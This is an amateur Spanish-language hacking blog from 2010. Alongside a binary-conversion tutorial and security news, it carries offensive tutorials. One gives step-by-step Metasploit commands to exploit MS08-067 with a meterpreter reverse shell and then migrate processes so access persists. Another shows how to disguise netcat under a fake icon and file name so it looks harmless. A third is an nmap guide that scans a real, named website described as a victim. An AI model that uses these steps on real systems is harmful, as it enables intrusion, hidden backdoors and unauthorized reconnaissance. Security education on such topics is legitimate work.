jueves, 29 de julio de 2010

Nuevo sitio

Hola gente, les quiero comentar que mude el blog  a otra direccion, pueden visitarnos en:


http://www.bbischol.blogspot.com

Este tiene una nueva inovacion en cuanto al diseño la tematica y un par de agregados como proyectos y cosas asi en las cuales participo ... Saludos

Dr [F]

martes, 30 de marzo de 2010

Mi cumpleaños

Hola estimados leectores (;P), hacia este post para comentarles que ayer (29 de marzo) fue mi cumpleaños...

Naci el 29/3/1994 a los 15 años nacio mi interes por todo este mundo (lo cual no me arrepiento) :P y supongo que mis conocimientos han hido creciendo y espero que sigan creciendo aun mas hasta llegar al infinito...

Bueno, el fin de este POST es que sepan un poco mas de mi..

Bueno hasta luego...

Pd: Cualquier duda del tuto de pasar de decimal a binario y vicersa preguntar por mensaje o cualquier cosa mandar al mail...


[W]oomD >>

lunes, 29 de marzo de 2010

Pasar de binario a decimal y viceversa

Hola, hoy les traigo un tutorial de como convertir numeros de Decimal a Binario y de decimal a binario

Antes de que leean este tutorial, deben tener conocimientos previos ("unidades" como pueden ser:
Bit, bytes,megabyte,kilobyte,gigabyte,terabyte,etc)

Aca les dejo un mini resumen...

  • Bit => Un bit representa un cero y un uno (0 y 1), se denota “b”
  • Nibble => Es equivalente a 4 bits, se denota “N”
  • Byte => Es equivalente a 8 bits, se denota “B”
  • Kilobyte => Es equivalente a 1024 bytes, se denota “KB”
  • Megabyte => Es equivalente a 1024 KB, se denota “MB”
  • Gigabyte => Es equivalente a 1024 MB, se denota “GB”
  • Terabyte => Es equivalente a 1024 GB, se denota “TB”
  • Pentabyte => Es equivalente a 1024 TB, se denota “PB”
  • Exabyte => Es equivalente a 1024 PB, se denota “EB”
  • Zettabyte => Es equivalente a 1024 EB, se denota “ZB”
  • Yottabyte => Es equivalente a 1024 ZB, se denota “YB”
  • Brontobyte => Es equivalente a 1024 YB, se denota “BB”

Esto sirve de mucho ya que los ordenadores interactuan entre si con numeros binarios ( 0 y 1)

IP: Protocolo de internet (Internet Protocol) se encarga del direccionamiento de datos, sabe de donde viene y hace donde va un archivo/dato determinado


¿Que es una IP?

Es un numero logico que identifica  de una manera logica y jerarquica un equipo conectado a internet.

Una direccion IP como nosotros las conocemos, esta compuesta por numeros Hexadecimales como puede ser

201.222.223.123

Pero para las computadoras no son mas que una agrupacion (octeto) de ceros y unos, lo que pretende este texto es enseñarle al leector como pasar esos numeros a ceros y unos y viceversa, comenzemos:


Decimal A binario:

Bueno, esto es muy sencillo

Lo unico que deben saber es:

Dividir,Ordenar, nada mas :P miren:

tenemos este numero: 50 y lo queremos pasar a codigo binario ¿Como hacemos?

Bueno dividimos a 50 por 2 nos da 25 y resto 0 ¿No es asi?
Podriamos decir que el resto nos da nuesta "parte" del numero en binario

numero 50 25 12 6 3 1  
resto     0   1    0  0 1 1

Explico: a 50 lo dividimos por 2 nos da resto cero, 50:2 = 25

25    : 2
04      12
  1

25: 2 nos da resto 1 y nos da como resultado 12, 12:2 = 6 (resto 0), 6: 2 = 3 resto 0, 3:2 = 1 resto 1, cuando te queda 1 al final, siempre queda resto 1

Se divide por 2 hasta que el numero quede menor a 1...

  3    :2
-2     1
 1     

un ejemplo:

numero: 300

300  150  75  37  18 9  4  2  1
 0       0    1    1     0  1  0  0  1

con ordenarlo me referia a que vaya de derecha a izq asi:
Decimal     Binario
   300    =   100101100

veamos otro ejemplo:

numero: 750

750  375  187  93  46  23  11  5  2  1
  0     1      1     1    0     1    1   1  0  1

750   =   1011101110

¿Se entendio?

cualquier duda preguntar al msn o en el mismo blog


Pasando de Binario a decimal

Para realizar esta operación usaremos el método de potencias, así que obviamente debemos saber y entender potencias.

En este caso las potencias se utilizan de base 2, con exponente par desde el cero (0), hasta donde podamos llegar por cada cifra correspondiente a la transformación, luego se debe multiplicar por el número binario correspondiente a cada cifra (0 o 1), y finalmente sumar los resultados.

siguiendo con el ejemplo anterior:

750   =   1011101110

0 = 2^0 = 1
1=  2^1 = 2
1= 2^2 = 4
1= 2^3 = 8
0 =2^4 = 16
1 =2^5 = 32
1=2^6 = 64
1=2^7 = 128
0=2^8 = 256
1=2^9 =512

finalmente solo se suman los numeros 1 ej;

2+4+8+32+64+128+512 = 750

tarann.... ! nos dio el mismo numero que antes ... Woow :P

Bueno, eso fue todo

By Woomd...

PD1: Este tutorial, fue realizado a las 4:07 de la madrugada.. sean considerados con los comentarios o con las quejas...:D

Bye

jueves, 25 de marzo de 2010

Multiples Vulnerabilidades en google Chrome

Se han anunciado un total de nueve vulnerabilidades en Google Chrome, el navegador de Google. Un atacante remoto podría emplear estos problemas para evitar restricciones de seguridad, descubrir información sensible o comprometer un sistema vulnerable.

El primer problema se debe a errores de punteros en la sandbox mientras que otro problema se debe a metadatos persistentes como Web Databases y STS. Más problemas se dan porque las cabeceras http se procesan antes de la comprobación de navegación segura (SafeBrowsing).

Una vulnerabilidad de ejecución remota de código se produce al procesar SVG mal construidos. Otro problema de desbordamiento de entero en objetos JavaScript WebKit, también podría emplearse para ejecutar código arbitrario.

Otros problemas están relacionado con los diálogos de autenticación http básica y de descargas. Una última vulnerabilidad reside en el tratamiento de elementos SVG vacíos.

Se recomienda actualizar a Google Chrome versión 4.1.249.1036, disponible 



Fuente http://www.foro.portalhacker.net

lunes, 22 de marzo de 2010

Disfrasando a NetCat con cualquier Icono

Hola, aca  denuevo.
En esta oportunidad, voy a hacer un tutorial de como disfrasar netcat con cualquier iconito para que no parezca un .exe comun y corriente.

Materiales Necesarios:

NetCat
ResHacker
Pack De Iconos

descargar netcat -----> http://www.megaupload.com/?d=Z1AMQA1T

descargar RESHACKER -----> http://www.megaupload.com/?d=R1O50T2P

Descargar pack iconos ----->  http://img191.imageshack.us/img191/7816/55142341.jpg

Bueno comenzemos con este tutorial :D


Primero, voy a explicar como hacer todo detalladamente y luego, colgare algunas screens paso por paso de como se realiza.



En primer lugar abres el ResHacker y le das en File/Open y buscas el nc(netcat). Después pinchas en acción y luego en Add a new Resource, luego se verá la ventana que ves a la derecha y presionas donde dice “Open file with new resource” (paso 3) para buscar el icono que teniamos, luego donde dice “Resource Name” Debes escribir la palabra “ICON” tal como se ve en la foto y para finalizar presionamos en “Add Resource” y en “File/Save”. Con todo esto te creará un respaldo del netcat original que puedes borrarlo con toda tranquilidad y al refrescar la pantalla (F5)  veras que el netcat tiene el icono de
Paso 2: renombramos nc.exe y desde ahora se llamará “loquequieras.exe” XD, luego pinchas el netcat con el botón derecho de tu Mouse y deberá aparecer algo así (obviamente después de haber instalado el winrar.)


Screens:


2)











By [W]oomD >>

viernes, 19 de marzo de 2010

XSS en Web Site


Hola, me tope hoy con una web vulnerable a XSS y como estaba aburrido decidi postearlo:


¿Que es XSS? (SEGUN WIKI)


Su nombre original es "Cross Site Scripting", y es abreviado como XSS para no ser confundido con las siglas CSS, Hojas de estilo) Las vulnerabilidades de XSS originalmente abarcaban cualquier ataque que permitiera ejecutar código de "scripting", como VBScript o Javascript, en el contexto de otro sitio web (y recientemente esto se podría clasificar más correctamente como "distintos orígenes").
Estos errores se pueden encontrar en cualquier aplicación que tenga como objetivo final, el presentar la información en un navegador web No se limita solamente a sitios web, ya que puede haber aplicaciones locales vulnerables a XSS, o incluso el navegador en sí. El problema está en que usualmente no se validan correctamente los datos de entrada que son usados en cierta aplicación. Esta vulnerabilidad puede estar presente de forma directa (también llamada persistente) o indirecta (también llamada reflejada).

Directa (Persistente): este tipo de XSS comúnmente filtrado, y consiste en invadir código HTML peligroso en sitios que así lo permiten

Indirecta (Reflejada): este tipo de XSS consiste en modificar valores que la aplicacion web utiliza para pasar variables entre dos páginas, sin usar sesiones y sucede cuando hay un mensaje o una ruta en la URL del navegador, en una cookie, o cualquier otra cabecera HTTP (en algunos navegadores y aplicaciones web, esto podría extenderse al DOM del navegador).

Cookie: Fragmento de informacion que se almacena en el disco duro del visitante de una pagina web a traves de su navegador.

Usos mas frecuentas de Cookies:

Cuando un user ingresa un usuario y contraseña en una web, la cookie almacena los datos asi no tiene que andar escribiendola dia y noche :P

Conseguir Info sobre los datos de navegacion del user 

Bueno, aca dejo la screen:


Aclaro, que este tutorial, fue una introduccion a XSS, todavia me falta aprender a mi PHP, asi que todavia no prefiero meterme con WebHacking.. excepto con SqLi xD

NoS VeMoS Dr [F]

domingo, 14 de marzo de 2010

MetaSploit FrameWork 3.3

Hola, este tutorial, es para gente que ya tenga instalado el metasploit framework en su computadora y que sepa el manejo basico de este Soft.

primero:

¿De que se trata la vulnerabilidad MS08_067_NETAPI?

Se trata de una vulnerabilidad para la ejecución remota de código. Un atacante que aprovechara esta vulnerabilidad podría tomar el control completo de un sistema afectado de forma remota. En los sistemas basados en Microsoft Windows 2000, Windows XP y Windows Server 2003, un atacante podría aprovechar esta vulnerabilidad sobre RPC sin autenticación y ejecutar código arbitrario. Si falla el intento de aprovecharse de esta vulnerabilidad, también podría dar lugar a un bloqueo en Svchost.exe. Si se produce dicho bloqueo, afectará al servicio del servidor. El servicio del servidor proporciona compatibilidad con el uso compartido de archivos, impresoras y canalizaciones con nombre a través de la red.

La causa de esta vulnerabilidad es el servicio del servidor, que no controla correctamente las solicitudes de RPC especialmente elaboradas para ello. 





Aca dejo (en forma entera) como explotar la vulnerabilidad  y mas abajo lo detallare con fotos.


use exploit/windows/smb/ms08_067_netapi
show options
set RHOST 192.168.1.103
set PAYLOAD windows/meterpreter/reverse_tcp
show options
set LHOST 192.168.1.105
exploit


y listo ya ingresamos


Bueno Comenzemos explotando la vulnerabilidad:




Bueno, en primera instancia, vemos la pantalla del Meta Sploit Framework 3.3 actualizado.

Aca cargamos el exploit:

use exploit/windows/smb/ms8_067_netapi
show options
set RHOST 192.168.1.103

vemos las opciones que nos pide y configuramos el pc a atacar
configuramos el host REMOTO: ip

Despues de cargar el HOST remoto, cargo el Payload .
en mi caso

set payload windows/meterpreter/reverse_tcp

lo que hago es que se conecte el host a mi , util en caso de tener un firewall bloqueando conexiones entrantes

y le digo a que maquina quiero que se conecte meterpreter

set LHOST 192.168.1.101

uso el comando exploit para empezar a explotar la vulnerabilidad

Aca esta creando la sesion meterpreter



Sesion meterpreter abierta...

Con el comando ps veo la lista de procesos

y ahora migramos a un proceso que sabemos que no se va a terminar conclusion, podemos estar en la pc el tiempo que querramos, mientras no se reinicie el PC.xD



Y ahora migramos a otro proceso el nombre a migrar del procesos

ej: migrate PID



¿se ve ?

migrate 728 que es el proceso del freeze en el ciber :D

y ahora abrire una shell i comprobare que es la Ip 192.168.1.103


Bueno, antes que nada, este tutorial fue hecho en un ciber con el consentimiento del administrador, que estubo en todo momento detras de MI :D

Tutorial By Dr [F]

sábado, 13 de marzo de 2010

Microsoft me rio de la seguridad

Bueno, aca dejo algo que me intereso mucho cuando lo vi, y advierto a cualquier usuario (depaso)


Fuente: Expansión.com


 Microsoft alerta sobre el peligro de pulsar F1






"La compañía Microsoft  alerta a sus usuarios de Windows XP sobre el peligro de hacer caso a los sitios web que les solicitan que pulsen la tecla de ayuda'F1', ya que, de hacerlo, podrían sufrir graves problemas de seguridad.

En un aviso de seguridad publicado esta semana -después de que el investigador polaco Maurycy Prodeus revelara el fallo el viernes- Microsoft explicó que existe una vulnerabilidad de VBScript que podría hacer que algunos sitios web logren hacerse con el control de ordenadores de extraños sin que medie el consentimiento del propietario.

Según recoge 'ComputerWorld', en el mismo comunicado Microsoft ofrecía algunos consejos sobre cómo proteger los ordenadores hasta que el parche de seguridad fuera enviado. "La vulnerabilidad se encuentra en la forma en la que VBScrip interactúa con los archivos de Ayuda de IE. Si un sitio web malicioso muestra un cuadro de diálogo especialmente diseñado y el usuario pulsa la tecla 'F1', código arbitrario podría ser ejecutado en el contexto de seguridad del usuario", explica el comunicado de seguridad.

Esta vulnerabilidad afecta a ordenadores con sistemas operativos Windows 2000, Windows Server 2003 y Windows XP con el navegador Internet Explorer.

Hasta que no este preparado el parche de seguridad, Microsoft ha aconsejado a sus usuarios que no pulsen F1 cuando un sitio web se lo solicite. Además, los usuarios pueden proteger sus ordenadores desactivando la ayuda de Windows.

Según publica 'Computer World', un alto directivo del Microsoft Security Response Center (MSRC), Jerry Bryant, aseguró en un e-mail que la compañía "está preocupada porque esta vulnerabilidad no fuera revelada de una manera responsable, lo que podría poner en riesgo a los clientes".

Bryan afirmó que Microsoft no ha fijado un calendario para una revisión, y sólo dijo que "Microsoft tomará medidas apropiadas para ayudar a proteger a sus clientes"


Lo mas gracioso de esto, es que MICROSOFT no catalogo la vulnerabilidad como critica porque segun Ellos, el atacante tiene que avisar a la victima que tiene que pulsar una tecla -.-

Saluudos

Dr [F]

Manage Folders 0.1 xD

Hola, les dejo aca mi nuevo "invento" :P lo hize cuando estaba aburrido

Lo que hace este programita, encripta una carpeta y cuando se cambia de usuario, el otro no la podra abrir....
esta bueno no ?
:P

dejo el code y el .exe

Code






Option Explicit   'obligo a declrar las variables
Dim sisisi As Boolean ' declaro una variable con valo booleano
Dim ruta As String  'declaro una variable ruta con valor de cadnea
Dim sisisi2 As Boolean 'declaro la variable sisisi2 con valor booleano
Dim rut33 As String  'etc

Private Declare Function AnimateWindow Lib "user32" ( _
ByVal hwnd As Long, _
ByVal dwTime As Long, _
ByVal dwFlags As Long) As Long     'declaro la api animatewindow 

REM hwnd se aplica a la ventana que quiero aplicar el efecto
rem dwtime es el tiempo en el que sucedera la accion (en milisegundos)
rem dwflags son los valores que permiten indicar que efecto usar y otras propiedades  como la orientación del efecto, es decir que vaya apareciendo desde el medio , del lado izq al derecho con efecto fade o transparencia, etc



Private Const AW_ACTIVATE = &H20000  'constante que indica que despues se active la ventana
Private Const AW_BLEND = &H80000  ' constante que indica la transparencia

Private Declare Function EncryptFile Lib "ADVAPI32" Alias "EncryptFileA" ( _
ByVal lpfilename As String) As Boolean 'declaro api para encriptar archivos

Private Declare Function DecryptFile Lib "ADVAPI32" Alias "DecryptFileA" ( _
ByVal lpfilename As String, _
ByVal dwreserved As Long) As Long 'api para desencriptar archivos

Public Function encriptar_archivos(ByVal ruta1 As String) As Boolean 'declaro una funcion con la variable ruta1 
encriptar_archivos = EncryptFile(ruta1) 'digo que la funcion sea = a la api
End Function


Public Function desencriptar_archivos(ByVal ruta2 As String) As Boolean 'declaro funcion y la var ruta2
desencriptar_archivos = DecryptFile(ruta2, 0) 'digo que la funcion sea = a la api pero esta vez con la opearcion inversa (0)
End Function



Private Sub command1_click() 'al hacer click
ruta = InputBox("Ruta del Archivo a encriptar: ", "By Dr [F]", "Aca") ' digo que la variable ruta sea el inputbox
sisisi = encriptar_archivos(ruta) 'sisisi = se aplica la funcion desencriptar en la ruta
If sisisi Then ' si sisisi nada entonces
MsgBox "Archivos Encriptado Satisfactoriamente", vbInformation, "Good" 'este mensaje
Else ' de lo contrario  
MsgBox Err.Description 'el error que haya sucedido
End If

End Sub

Private Sub command2_click()
rut33 = InputBox("Ruta del Archivo a desencriptar: ", "By Dr [F]", "Aca")
sisisi2 = desencriptar_archivos(rut33)
If sisisi2 Then
MsgBox "Archivos desencriptado satisfactoriamente", vbInformation, "Good"
Else
MsgBox Err.Description, vbCritical, "Error"
End If
Rem lo mismo
End Sub




Private Sub form_load()
Me.Caption = "Manage Folder v 0.1 xD"
Dim lala As Long
lala = AnimateWindow(Me.hwnd, 700, AW_BLEND Or AW_ACTIVATE)
Command1.Caption = "Encriptar"
Command2.Caption = "Desencriptar"
Command1.BackColor = vbGreen
Command2.BackColor = vbGreen
End Sub






Aca dejo el .exe no tengo ganas de analizarlo ... analisenlo uds, asi depaso se acostumbran

lo pueden analisar aca:

.exe:






By Dr [F]


Contador de Lineas

Bueno, aca les dejo mi contador de Lineas en visual basic 6, este programa es muy facil de usar y sencillo, adicto a los contadores de las lineas de los codes :P

Aca ----------> programa contadirlineas.exe


Aca  ---------> Codigo.. viene en un .txt




Analisis con Novirus thanks para los desconfiados -.-


Report date:2010-03-13 15:50:35 (GMT 1)
File name:Contadorlineas.exe
File size:20480 bytes
MD5 hash:82aae17fbfe11d2079622221fdd98536
SHA1 hash:5cd72b84fbf9fd0f586d1cae9bb7b66a1eec9733
Detection rate:0 on 21 (0%)
Status:CLEAN
AntivirusDatabaseEngineResult
a-squared13/03/20104.5.0.8-
Avast100313-04.8.1368-
AVG271.1.1/27209.0.0.725-
Avira AntiVir7.10.4.1887.6.0.59-
BitDefender13/03/20107.0.0.2555-
ClamAV03/03/20100.95.3-
Comodo34683.13.579-
Dr.Web13/03/20105.0-
Ewido13/03/2010--
F-PROT6201003126.3.3.4884-
G-Data19.93092.0.7309.847-
Ikarus T303/03/20101001074-
Kaspersky13/03/20109.0.0.736-
McAfee03/03/20105.1.0.0-
NOD3249404.0.474-
Panda02/03/20109.5.2-
Solo13/03/20108.0-
TrendMicro887(688700)1.1-1001-
VBA3213/03/20103.12.12.2-
VirusBuster1.5.5.0-
Zoner13/03/20100.2-





viernes, 12 de marzo de 2010

Escanear Objetivo Con Nmap

Hola, en esta oportunidad, les enseñare a hacer una exploracion del sistema que estemos por atacar con nuestro querido NMAP...

Primero un poco de definicion:

¿Que es Nmap?

Nmap es un programa de code abierto que sirve para efectuar rastro de puertos escrito originalmente por Gordon Lyon (más conocido por su alias Fyodor Vaskovich). Se usa para evaluar la seguridad de sistemas informáticos, así como para descubrir servicios o servidores en una red informática.

Fuente Wikipedia

PD: Aclaro que para entender un poco mas del NMAP, es necesario comprender basicamente el PROTOCOLO TCP/IP Y algo de REDES, en el blog hay muy buena info.

Bueno, empezemos...

Lo unico que necesitaremos, sera el nmap que lo podremos conseguir aqui:

http://download.insecure.org/nmap/dist/nmap-4.20-setup.exe

Lo instalamos en el Disco Raiz

Bueno cuando este todo listo, nos dirigiremos a nuestra preciada consola de comandos:



Bueno, lo primero que haremos con nuestro NMAP, sera realizar un tipo de escaneo basico a una web objetivo (la que quieran). yo por mi parte se lo hare a www.pasionverdolaga.com.ar

Con este tipo de escaneo:

nmap  
nos saldran los puertos abiertos que tiene el servidor en que se aloja la web



¿Ven ?

Ahora con la opcion -O del nmap, podremos saber o estar casi seguros del Sistema Operativo que utiliza nuestra victima, y ademas nos dara los puertos abiertos.

nmap -O o nmap -O

Miremos la informacio que nos tira.



Nos dice que es probable que el sistema operativo sea Linux 92% seguro , vemos las versiones de LINUX..
Tambien vemos que por el medio hay un router y un firewall. esto es medio dificil de enteder, pero se aprende leyendo :D

Con el comando -sT, veremos, si la IP es dinamica o no...

ejecutamos...

nmap -sT o nmap -sT
y vemos si es dinamica o estatica

Despues podemos ver los servicios que corren en la web con el comando -sV

ponemos

nmap -sV www.web.com.ar



Ahi vemos la version del FTP: PROFTPD... si tubiera algun otro servicio corriendo bajo algun programa apareceria la version, esto es muy util a la hora de hacer, buscar exploits.

Si el destino, tiene un Firewall, que no acpeta peticiones entrantes (que bloquea pings) tendremos que usar la opcion -P0 asi nuestro escaneo no manda PINGS al destino.

ej:

nmap -P0 -O -Sv www.web.com.ar

Ese seria un escaneo completo, ya que en caso de que bloqueara los pings, estariamos evadiendo el firewall, estariamos escaneando el sistema operativo, y los servicios que corren en el...

Probemos:



Vemos un router linksys... y nmap nos dice que es un SO Unix... (muchos bugs :P)

Tambien podemos decirle a nmap que agregue mas informacion, con el modo verbose -vv (se acordaran de ncat :P)

esto se usa asi:

nmap -O -sV -vv www.web.com.ar



Como vemos nos da mucha mas info, pero lamentablemente, a mi no me entro en la pantalla :P

Bueno, ahora no pondre mas fotos, porque creo que si sigo asi le voi a hacer overflow a imageshack.us :P

sigamos con algunos comandos para escanear redes... LAN

nmap -sV 192.168.0.1-254 -P0 -vv -p1 - 25000

Con ese comando le estamos diciendo a nmap, que nos de informacion de los servicios de el rango de red 192.168.0.1 al 192.168.0.254. Que agrege info con vv y que recorra los puertos del 1 al 25000

Bueno, eso es todo por hoy, si quieren saber mas comandos del NMAP vasta con ir a la consola y poner

nmap y darle a enter, saldran una lista de comandos.

Listo lala....

PD: 100% echo por mi

Saluda: Dr [F]